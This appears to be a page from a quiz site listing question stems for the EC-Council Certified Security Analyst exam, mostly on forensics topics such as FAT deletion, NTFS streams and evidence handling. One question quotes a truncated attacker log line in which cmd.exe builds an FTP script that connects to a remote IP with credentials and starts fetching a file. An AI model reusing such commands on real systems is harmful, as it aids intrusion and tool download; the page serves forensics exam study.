Skip to content
Equizzing
Home
Quiz Categories
Linux Entry Level LPI Level 1 LPI Level 2 LPI Level 3
Contact

Quiz 412-79

Recent Comments

  1. Jan Dowsky on which type of Layer 2 attack can you intercept traffic …
  2. Joao on Which happens if the swap file of a virtual machine is …
  3. P.C.S.O.R. on What could cause this error?
  4. mur on Which two statements about administrative access to the Cisco Secure ACS SE are true?
  5. rubik on Which GPOs will apply to User2 when the user signs in t…

Quiz 412-79

Quiz 412-79, EC-Council Certified Security Analyst (ECSA)

From the options given below choose the one which best interprets the following entry…

What happens when a file is deleted by a Microsoft operating system using the FAT file system?

“cmd1.exe /c open 213.116.251.162 >ftpcom” “cmd1.exe /c echo johna2k >>ftpcom” “cmd1.exe /c echo haxedj00 >>ftpcom” “cmd1.exe /c echo get n

What is the actual error code that you would see in the log for resource not found?

What are two common methods used by password cracking software that you can use to obtain the password?

When examining a hard disk without a write-blocker, you should not start windows because Windows will write data to the:

Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?

What type of file is represented by a colon (:) with a name following it in the Master File Table of NTFS disk?

In Microsoft file structures, sectors are grouped together to form:

What do you think you should do if the evidence you found appears to be exculpatory and is not being released to the defense ?

Posts navigation

Previous 1 … 13 14 15 … 32 Next
Equizzing
    Privacy Policy

© 2025 Equizzing